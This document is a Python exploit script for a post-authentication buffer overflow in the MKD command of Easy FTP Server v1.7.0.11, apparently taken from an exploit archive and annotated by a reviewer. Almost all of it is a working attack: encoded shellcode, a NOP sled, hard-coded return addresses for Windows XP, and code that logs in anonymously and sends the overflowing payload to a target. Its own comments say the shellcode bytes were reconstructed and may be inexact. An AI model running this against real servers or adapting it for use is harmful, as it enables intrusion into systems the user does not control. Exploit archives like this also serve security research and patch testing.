Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit
Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)
================================================================================
#!/usr/bin/python
import socket
import struct
import sys
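# Tested (per the original author) on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ].
#
# NOTE(review): the listing this was recovered from had every backslash
# stripped and some "x" characters turned into "×" by the publishing site
# ("rn" for "\r\n", "x90" for "\x90").  The escapes below were restored from
# the visible hex digits; the byte count (40 + 228 + 4 = 272) agrees with the
# original "Buffer needed -> 272 bytes" note, but compare against a clean copy
# before trusting it.  This PoC spawns calc.exe on the server: only run it
# against hosts you are authorised to test.

BANNER = """
#
****************************************************************************
# #
* Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication *
* Author / Discovered by : Karn Ganeshen *
* Date : July 5, 2010 *
* KarnGaneshen [aT] gmail [d0t] com *
* http://ipositivesecurity.blogspot.com *
# #
****************************************************************************
#
"""

# Metasploit calc.exe PoC payload: 228 bytes, shikata_ga_nai, 1 iteration.
# Encoded to avoid \x00 \x0a \x2f \x5c (see BAD_CHARS).  The leading bytes
# (\xda\xc0\xd9\x74\x24\xf4 ... \x5a\x33\xc9\xb1\x33) are the usual
# shikata_ga_nai decoder stub, which supports the reconstruction.
SHELLCODE = (
    b"\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
    b"\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
    b"\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
    b"\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
    b"\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
    b"\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
    b"\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
    b"\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
    b"\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
    b"\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
    b"\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
    b"\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
    b"\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
    b"\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
    b"\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
    b"\x51\x6b\x28"
)

# Bytes the original encoder was told to avoid inside the MKD argument
# (NUL, LF, '/' and '\' -- the values a string/path handler would truncate
# or rewrite).
BAD_CHARS = b"\x00\x0a\x2f\x5c"

# 40 x NOP; the original note says EBP points into this sled once the
# overflow has fired.
NOP_SLED = b"\x90" * 40

# Address written over the saved return address.  Both values are absolute,
# build-specific addresses inside the XP-era (non-ASLR) server process; the
# original script hard-coded only the SP2 value and mentioned the SP3 one in
# a comment, so "sp3" is untested here.  Which gadget lives at these addresses
# is not shown in the original -- presumably a jump through EBP into the sled.
RET_ADDRS = {
    "sp2": 0x00883B10,
    "sp3": 0x00893B58,
}
DEFAULT_TARGET = "sp2"

# Bytes needed to reach and overwrite the saved return address.
BUFFER_LEN = 272

# Seconds to wait for the connection/login replies and for the post-MKD
# verdict.  The original script had no timeout and could block forever on the
# final recv().
CONNECT_TIMEOUT = 10
REPLY_TIMEOUT = 30


def build_payload(target_os=DEFAULT_TARGET):
    """Return the MKD argument: NOP sled + shellcode + little-endian return address.

    Args:
        target_os: key into RET_ADDRS ("sp2" or "sp3").

    Returns:
        bytes of length BUFFER_LEN.  The packed address ends in a NUL; it is
        the very last byte sent, so it terminates the string instead of
        truncating the payload and does not conflict with BAD_CHARS.

    Raises:
        KeyError: unknown target_os.
        ValueError: the reconstructed payload has the wrong length or the
            shellcode contains a bad character (a sign the bytes were
            mis-transcribed).
    """
    ret = struct.pack("<I", RET_ADDRS[target_os])
    payload = NOP_SLED + SHELLCODE + ret
    # A wrong length would land the return address off the saved-EIP slot.
    if len(payload) != BUFFER_LEN:
        raise ValueError("payload is %d bytes, expected %d" % (len(payload), BUFFER_LEN))
    if any(c in SHELLCODE for c in BAD_CHARS):
        raise ValueError("shellcode contains a bad character from %r" % (BAD_CHARS,))
    return payload


def _text(data):
    """Decode a server reply for display without raising on odd bytes."""
    return data.decode("latin-1", "replace").strip()


def _login(sock):
    """Log in as the default 'anonymous' account and return True on a 230 reply.

    MKD is only reachable after a successful login (the bug is post-auth), so
    sending the payload without one just yields a misleading error reply.
    """
    print("[*] " + _text(sock.recv(1024)))
    sock.send(b"USER anonymous\r\n")
    print("[*] " + _text(sock.recv(1024)))
    sock.send(b"PASS anonymous\r\n")
    reply = sock.recv(1024)
    print("[*] " + _text(reply))
    return reply.startswith(b"230")


def _deliver(sock, payload):
    """Send the MKD command and report a (heuristic) verdict.

    No reply / dropped connection is the expected sign that the handler was
    hijacked (crash or shellcode ran).  Any FTP reply means the overflow was
    not triggered -- most likely the account lacks 'Create Directory'
    permission -- so the reply is shown rather than guessed at.
    """
    print("[+] Sending payload...")
    sock.sendall(b"MKD " + payload + b"\r\n")
    print("[!] Verifying if the user has 'Create Directory' permission. "
          "Waiting up to %ds for a reply..." % REPLY_TIMEOUT)
    sock.settimeout(REPLY_TIMEOUT)
    try:
        reply = sock.recv(1024)
    except socket.timeout:
        print("[+] No reply within %ds: server hung or shellcode ran. "
              "+++Exploit likely successful+++ ^_^" % REPLY_TIMEOUT)
        return
    except socket.error as exc:
        print("[+] Connection dropped (%s): server crashed or shellcode ran. "
              "+++Exploit likely successful+++ ^_^" % exc)
        return
    if not reply:
        print("[+] Server closed the connection without a reply. "
              "+++Exploit likely successful+++ ^_^")
        return
    print("[*] " + _text(reply))
    print("[!] Uhh.. Server answered, so the overflow was not reached "
          "(usually: user does not have MKD privilege). +++Exploit failed+++")


def main(argv=None):
    """CLI entry point: ``easyftp_mkd.py <Target IP> <Port> [sp2|sp3]``."""
    argv = sys.argv if argv is None else argv
    print(BANNER)
    if len(argv) not in (3, 4):
        print("Usage: ./easyftp_mkd.py <Target IP> <Port> [sp2|sp3]")
        sys.exit(1)
    target = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        print("[!] Port must be an integer, got %r" % (argv[2],))
        sys.exit(1)
    target_os = argv[3].lower() if len(argv) == 4 else DEFAULT_TARGET
    if target_os not in RET_ADDRS:
        print("[!] Unknown target %r; choose one of %s"
              % (target_os, ", ".join(sorted(RET_ADDRS))))
        sys.exit(1)
    payload = build_payload(target_os)

    print("[+] Launching exploit against " + target + "...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(CONNECT_TIMEOUT)
    try:
        try:
            sock.connect((target, port))
            print("[+] Connected!")
        except socket.error as exc:
            # Non-zero exit: the original returned 0 here, which misreported
            # a failed connection as success to the calling shell.
            print("[!] Connection failed! (%s)" % exc)
            sys.exit(1)
        try:
            logged_in = _login(sock)
        except socket.error as exc:
            print("[!] Connection error during login: %s" % exc)
            sys.exit(1)
        if not logged_in:
            print("[!] Login as 'anonymous' was not accepted; the overflow is "
                  "post-auth. +++Exploit failed+++")
            sys.exit(1)
        _deliver(sock, payload)
    finally:
        sock.close()


if __name__ == "__main__":
    main()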
Source: http://inj3ct0r.com/exploits/13387
